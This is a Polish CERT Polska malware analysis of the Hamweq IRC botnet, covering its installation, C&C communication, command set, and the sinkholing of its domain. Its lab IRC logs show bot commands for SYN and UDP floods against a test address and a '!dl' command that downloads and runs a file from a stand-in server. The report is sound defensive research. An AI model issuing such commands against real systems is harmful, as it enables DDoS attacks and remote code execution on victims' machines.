Botnet Hamweq - analiza



Podobne dokumenty
Necurs analiza malware (1)

Raport z analizy porównawczej rodzin ransomware JAFF i Cry

Tytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager

Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU

Analiza malware Remote Administration Tool (RAT) DarkComet

Algorytm DGA wykorzystywany w trojanie Emotet

n6: otwarta wymiana danych

Trojan bankowy Emotet w wersji DGA

Analiza Trojana NotCompatible.C

Wyższy poziom bezpieczeństwa

Botnet Zeus - analiza w laboratorium CERT

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci

Analiza aktywności złośliwego oprogramowania Njw0rm

Instalacja Active Directory w Windows Server 2003

Stacja graficzna szkoleniowa typ A1, A2, B - Procedura odbioru sprzętu

Usługa skanowania podatności infrastruktury IT Banków oraz aplikacji internetowych

Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY

F-Secure Anti-Virus for Mac 2015

Instalacja NOD32 Remote Administrator

Biuletyn techniczny. CDN OPT!MA 12.0 Drukarki fiskalne w usługach terminalowych. Copyright 2007 COMARCH SA

Połączenie VPN Host-LAN SSL z wykorzystaniem przeglądarki. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Konto SSL 1.3. Grupa użytkowników

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

SIECI KOMPUTEROWE I TECHNOLOGIE INTERNETOWE

Wykonać Ćwiczenie: Active Directory, konfiguracja Podstawowa

Rozdział 1: Rozpoczynanie pracy...3

Rok szkolny 2015/16 Sylwester Gieszczyk. Wymagania edukacyjne w technikum

Usługi sieciowe systemu Linux

Instrukcja użytkownika

Instalacja i konfiguracja serwera IIS z FTP

KARTA KURSU. Administracja serwerami WWW

H-Worm RAT. Analiza aktywności złośliwego oprogramowania. CERT Orange Polska S.A. Warszawa, dnia

Biuletyn techniczny. Drukarki fiskalne w usługach terminalowych. Comarch OPT!MA Copyright 2007 COMARCH SA

Podręcznik instalacji Command WorkStation 5.6 z aplikacjami Fiery Extended Applications 4.2

Kaspersky Hosted Security

DESlock+ szybki start

Internet Explorer. Okres

Windows Defender Centrum akcji

Wykaz zmian w programie SysLoger

Zagrożenia warstwy drugiej modelu OSI - metody zabezpieczania i przeciwdziałania Autor: Miłosz Tomaszewski Opiekun: Dr inż. Łukasz Sturgulewski

Metody zabezpieczania transmisji w sieci Ethernet

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik

Współpraca z platformą dokumentacja techniczna

Otwock dn r. Do wszystkich Wykonawców

Połączenie VPN Host-LAN SSL z wykorzystaniem DrayTek Smart VPN Client. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2.

Agenda. Rys historyczny Mobilne systemy operacyjne

BEZPIECZEŃSTWO W SIECIACH

Analiza Malware Win32.KeyloggerSpy

Ataki na serwery Domain Name System (DNS Cache Poisoning)

Komunikacja przemysłowa zdalny dostęp.

Internetowy serwis Era mail Aplikacja sieci Web

Analiza malware Keylogger ispy

Program RMUA. Instrukcja konfiguracji i pracy w programie. (Wersja 2)

Laboratorium A: Zarządzanie drukowaniem/klucz do odpowiedzi

Analiza złośliwego oprogramowania. Cleopatra

Instrukcja instalacji Control Expert 3.0

TELEFONIA INTERNETOWA

Użycie pakietów instalacyjnych.msi w oprogramowaniu WYWIAD Plus

Software Updater F-Secure Unikatowe narzędzie, które chroni firmy przed znanymi zagrożeniami

Instrukcja Instalacji. Instalacja lokalna

Programy antywirusowe dostępne bez opłat

AE/ZP-27-16/14. Oprogramowanie do wykonywania kopii zapasowych oraz zarządzania maszynami wirtualnymi

Malware jest to wszelkie oprogramowanie stworzone do wykonywania złośliwych działań.

Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami

Połączenie VPN Host-LAN SSL z wykorzystaniem motp. 1. Aplikacje motp 1.1. DroidOTP 1.2. Mobile-OTP. 2. Konfiguracja serwera VPN

Bezpieczeństwo aplikacji WWW. Klasyfikacja zgodna ze standardem OWASP. Zarządzanie podatnościami

Snifery wbudowane w Microsoft Windows

Problemy z bezpieczeństwem w sieci lokalnej

INSTRUKCJA OBSŁUGI USTAWIEŃ DYNAMICZNIE PRZEDZIELANYCH ADRESÓW IP W URZĄDZENIACH SYSTEMU IP-PRO ORAZ REJESTRATORACH MY-DVR

Raport analiza oprogramowania Cleopatra: część II

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

7. zainstalowane oprogramowanie zarządzane stacje robocze

Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet.

Ko n f i gura cja p ra cy V ISO z bazą SQL S e rve r

Rok szkolny 2014/15 Sylwester Gieszczyk. Wymagania edukacyjne w technikum. SIECI KOMPUTEROWE kl. 2c

Laboratorium Sieci Komputerowych - 2

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:

!!!!!! FUDO% Architektura%Bezpieczeństwa! % % Warszawa,%28:04:2014%

Praca w sieci równorzędnej

Dokument zawiera instrukcję samodzielnej Instalacji Microsoft SQL Server 2008 R2 RTM - Express na potrzeby systemu Sz@rk.

Działanie komputera i sieci komputerowej.

Produkty. ESET Produkty

Opracowanie protokołu komunikacyjnego na potrzeby wymiany informacji w organizacji

Process Automation Toolkit (PAT)

Windows Serwer 2008 R2. Moduł x. IIS

Dokumentacja aplikacji Szachy online

Akademia Techniczno-Humanistyczna w Bielsku-Białej

VPN Host-LAN L2TP over IPSec z wykorzystaniem DrayTek Smart VPN Client

Polityka ochrony danych osobowych w programie Norton Community Watch

Robaki sieciowe. + systemy IDS/IPS

Technologia Automatyczne zapobieganie exploitom

Tytuł: Instrukcja obsługi Modułu Komunikacji internetowej MKi-sm TK / 3001 / 016 / 002. Wersja wykonania : wersja oprogramowania v.1.

Instrukcja instalacji v2.0 Easy Service Manager

Tomasz Greszata - Koszalin

SIECI KOMPUTEROWE. Podstawowe wiadomości

Zadanie z lokalnych sieci komputerowych. 1. Cel zajęć

Biuletyn techniczny. CDN OPT!MA 8.5 Wskazówki dotyczące instalacji programu. Copyright 2006 COMARCH SA

Przewodnik technologii ActivCard

INSTRUKCJA INSTALACJI I PIERWSZEGO URUCHOMIENIA APLIKACJI Rodzajowa Ewidencja Wydatków plus Zamówienia i Umowy

Urządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS

Bezpieczeństwo systemów i lokalnej sieci komputerowej

Transkrypt:

Botnet Hamweq - analiza CERT Polska / NASK 3 czerwca 2011 Oznaczenia Botmaster - osoba sprawująca kontrolę nad botnetem poprzez serwer CC. Zombie Botnet - zainfekowany komputer pod kontrolą botmastera. - zbiór komputerów Zombie, połączonych do danego serwera CC. Server CC - serwer poprzez który sprawowana jest kontrola nad botnetem. 1 Wstęp W niniejszym opracowaniu opisane zostały działania zespołu CERT Polska związane z analizą oraz monitorowaniem aktywności komputerów zainfekowanych malware Hamweq. Celem badania było poznanie mechanizmów działania, rozprzestrzeniania się oraz sposobów zarządzania opisywanym złośliwym oprogramowaniem. Dodatkowo przeprowadzona została analiza komend jaki mogą być przesłane przez botmastera do zombie. W porównaniu z innymi programami możliwości omawianego malware są stosunkowo ubogie, a kontrola nad zainfekowanym komputerem ogranicza się jedynie do wydawania paru prostych poleceń. Służą one głównie do przeprowadzania ataków DDoS - które stanowią obecnie jedno z największych zagrożeń w sieci (ostatnio często nagłaśnianych w mediach). Hamweq został również wymieniony w raporcie bezpieczeństwa opublikowanych przez Microsoft w połowie 2010 roku jako jeden z najczęściej spotykanych złośliwych programów. Znajduje się on dokładnie na trzecim miejscu, daleko 1

przed takimi malware jak ZeuS czy SpyEye. Ten właśnie fakt, oraz dostępnych szczegółowych analiz Hamweq w sieci stały się głównym powodem wybrania tego malware jako przedmiotu badania. 2 Ogólna charakterystyka Nazwa gatunku: Funkcje: Typ kanału CC: Skala infekcji: Oznaczenia AV: hamweq DDoS, spreading quasi-scentralizowany, sieć IRC duża, umiarkowana tendencja spadkowa Win32/Hamweq ; Backdoor.Hamweq Hamweq jest nazwą rodziny botnetów floodujących. Bot Hamweq nie gromadzi ani nie kradnie danych należących do zainfekowanych użytkowników. Według danych Microsoft był to jeden z najpopularniejszych botnetów w pierwszej połowie 2010 roku (1 117 380 wykryć w pierwszym kwartale i 779 731 wykryć w drugim kwartale). Bot Hamweq sam nie posiada wbudowanego protektora (o czym świadczą wyniki analizy próbki 669e11a2a9328bfdb87e2a2dd5f05df7). Jest on zazwyczaj zabezpieczany za pomocą zewnętrznych protektorów. Próbki, które analizowaliśmy zabezpieczone były protektorami: kkrunchy i UPX. Analizowaliśmy próbki o sygnaturach MD5: 1. 11768b975df1645ab245c4a6f16ca680 2. 1d6334aab1023642f8bf568de3b1f574 3. 376425b4918b8bf36133b76e5c065f39 4. 44bb1c82057811503c06d45f9045b1e0 5. 4bbdd4fb62dbe847a3e00a5f1ae56660 6. 58ef9f2459fa26e0c0a573d678a0bdb5 7. 669e11a2a9328bfdb87e2a2dd5f05df7 8. 7169ee9c8a29d70d74ed654ae391b5c8 9. 7a13bef5633e140206bc5a3b6bca8701 10. 7c0ec5524687df53a323c2322eec879e 11. 811fc289dd7f94c8a1369f5b88e8c87f 2

12. 94c940a493e73d65ab551821c6ab7593 13. a37c2f91a958097b0feb6899ffb4ebaa 14. b6a769c768205460bd4ca00cdf9c193b 15. c930781b754ecea913cfdfe2d53c2ba0 3 Analiza procesu instalacji Proces instalacji bota Hamweq to typowy proces wstrzykiwania wątków operacyjnych oraz zabezpieczenia działania. Boty Hamweq do rozprzestrzeniania stosują techniki typu drive-by download, nie potrafią same rozprzestrzeniać się przez sieć, infekują natomiast dyski wymienne. Nie instalują również hooków ukrywających ani szpiegujących. Po uruchomieniu, installer wykonuje operacje na tokenach bezpieczeństwa, a następnie pobiera listę aktywnych procesów. Wśród listy procesów wyszukuje procesu explorer.exe, przygotowuje wątki do wstrzyknięcia i wstrzykuje je. Przygotowanie wątków obejmuje zapisanie do nich potrzebnych danych (m.in dot. kanału CC, tj. domeny oraz adresów potrzebnych bibliotek). Wstrzyknięte wątki łączą się z serwerem IRC i oczekują na rozkazy. 4 Komunikacja bot CC Komunikacja bota z CC odbywa się za pośrednictwem protokołu IRC. Nazwy domenowe serwerów IRC są zapisane wewnątrz pliku wykonywalnego installera bota (nie jest wykorzystywany żaden mechanizm generowania nazw, nazwa domenowa jest przypisana do konkretnej próbki). Klient IRC, którym staje się bot, uwierzytelnia się za pomocą nazwy użytkownika i hasła, a następnie dołącza się do określonych kanałów i oczekuje na rozkazy. Należy zwróć uwagę na dodatkowy mechanizm zabezpieczeń uwierzytelniający botmastera. Boty odbierają rozkazy tylko od użytkownika o określonej nazwie (w jednej z analizowanych próbek: użytkownika w domenie evil.h-gov). Przykładowy log z komunikacji na rys. 4. 3

Rysunek 1: Poglądowy schemat działania botnetu Hamweq (źródło: Microsoft) 4

5 Architektura bota Rysunek 2: Wstrzyknięty wątek (1956) Architektura bota jest bardzo prosta. Cały zestaw składa się w zasadzie z jednego pliku wykonywalnego, tzw. installera, oraz wątków, które on wstrzykuje. Wątki dbają o to, by installer był uruchamiany przy każdym uruchomieniu systemu, installer natomiast za każdym razem wstrzykuje je do procesu explorer.exe. Poszczególne elementy synchronizują się ze sobą za pomocą mutexu. Rysunek 3: Domena zapisana we wnętrzu bota 5

Rysunek 4: Przykładowa konwersacja bota z CC Rysunek 5: Architektura infekcji 6

6 Wybrane oraz interesujące algorytmy Brak. 7 Wybrane funkcje bota Hamweq 7.1!r (reconnect) rozłączenie i połączenie z serwerem CC 16:05 < temp001>!r 16:05 -!- ptanlv [~tkmjkv@unknow.net] has quit [Read error to ptanlv[unknow.net]] 16:05 -!- immwae [~kqodgj@unknow.net] has joined #testing 7.2!q (quit) zakończenie procesu bota i uruchomienie nowego 12:05 <BtMaster>!q 12:05 -!- pujliq [~clyiwq@unknow.net] has quit [Read error to pujliq[unknow.net]] 12:05 -!- aloacp [~qhvakc@unknow.net] has joined #testing 7.3!v 16:05 <BtMaster>!v 16:05 < immwae> 1.4.2 7.4!d (version) wersja zainstalowanego oprogramowania (bota) (die) dezaktywacja (zakończenie) procesu bota 16:06 <BtMaster>!d 16:06 -!- immwae [~kqodgj@unknow.net] has quit [Read error to immwae[unknow.net]] 7

7.5!rem (remove) usunięcie plików bota oraz zakończenie procesu 16:29 <BtMaster>!rem 16:29 -!- xxnklf [~qmdxhn@unknow.net] has quit [Read error to xxnklf[unknow.net]] 7.6!s (silence) tryb cichy [bool] 12:07 <BtMaster>!s 1 12:07 <BtMaster>!v 12:08 <BtMaster>!s 0 12:08 <BtMaster>!v 12:08 < upgvtt> 1.4.2 7.7!j oraz!p (join/part) dołącz do kanału / opuść kanał IRC [string:nazwa-kanalu] 16:16 <BtMaster>!j #test 16:16 -!- fwneyl [~toqljj@unknow.net] has joined #test... 16:18 <BtMaster>!p #test 16:18 -!- fwneyl [~toqljj@unknow.net] has left #test [] 7.8!syn UWAGI: atak pakietami SYN [target-ip] [unknow] [unknow] wymagane 3 parametry, znaczenie dwóch nie jest znane 16:18 <BtMaster>!syn 10.0.0.2 100 100 16:18 < fwneyl> Start flooding. 8

7.9!udp UWAGI: 16:04 <BtMaster>!udp 10.0.0.2 1234 2 16:04 < khsvmz> Start flooding. 7.10!fstop atak pakietami UDP [target-ip] [target-port] [unknow] wymagane 3 parametry, znaczenie jednego nie jest znane zatrzymanie ataku 16:16 <BtMaster>!fstop 16:16 < fwneyl> Flooding done. 7.11!dl UWAGI: pobranie i uruchomienie pliku [src-url] [dst-filename] [unknow] wymagane 3 parametry, znaczenie jednego nie jest znane 16:27 <BtMaster>!dl http://http-server.local/calc.exe test1.exe 1 8 Monitorowanie domeny botnetowej Podczas analizy domen zapisanych badanych próbkach natrafiono na nazwę, której rejestracja wygasła. Najprawdopodobniej domena była zarejestrowana na okres testowy (do kilkunastu dni) - po czym została porzucona. Porzucona nazwa została zarejestrowana przez CERT Polska w celu monitorowania połączeń pochodzących od komputerów zainfekowanych wymienioną próbką. Na podstawie danych zebranych przez okres dwóch miesięcy można stwierdzić, iż botnet najprawdopodobniej został przerzucony na inną domenę. Wniosek ten wynika z faktu, iż do ustawionych w laboratorium serwerów próbowało podłączyć się jedynie parę komputerów zombie. Zarejestrowano również niewspółmierną (do ilości botów) ilość zapytań DNS o złośliwą domenę. Zarejestrowano ich prawie 50 000. Większość zapytań pochodziła ze 9

stałej puli adresów IP i odbywała się w regularnych odstępach czasowych - co sugeruje, że mogły one pochodzić z innych organizacji monitorujących i badających Hamweq. 9 Podsumowanie Zabezpieczenia Hamweq są bardzo słabe. Dysponujemy próbką pozbawioną jakiejkolwiek obfuskacji, która mogłaby (i bardzo możliwe, że to robi) służyć za uproszczony, akademicki przykład ircbota. Nie posiada on żadnych zabezpieczeń komunikacji ani wykrywania. Dane dotyczące kanału CC są zapisane wewnątrz bota jako zwykłe łańcuchy. Pozostałe próbki są zabezpieczone przez protektory innych autorów. Nie znaleźliśmy żadnych algorytmów godnych szczególnej uwagi. Być może popularność Hamweq jest właśnie efektem jego prostoty. Prosty bot jest łatwy do zmodyfikowania i powielenia dla początkującego botmastera. 10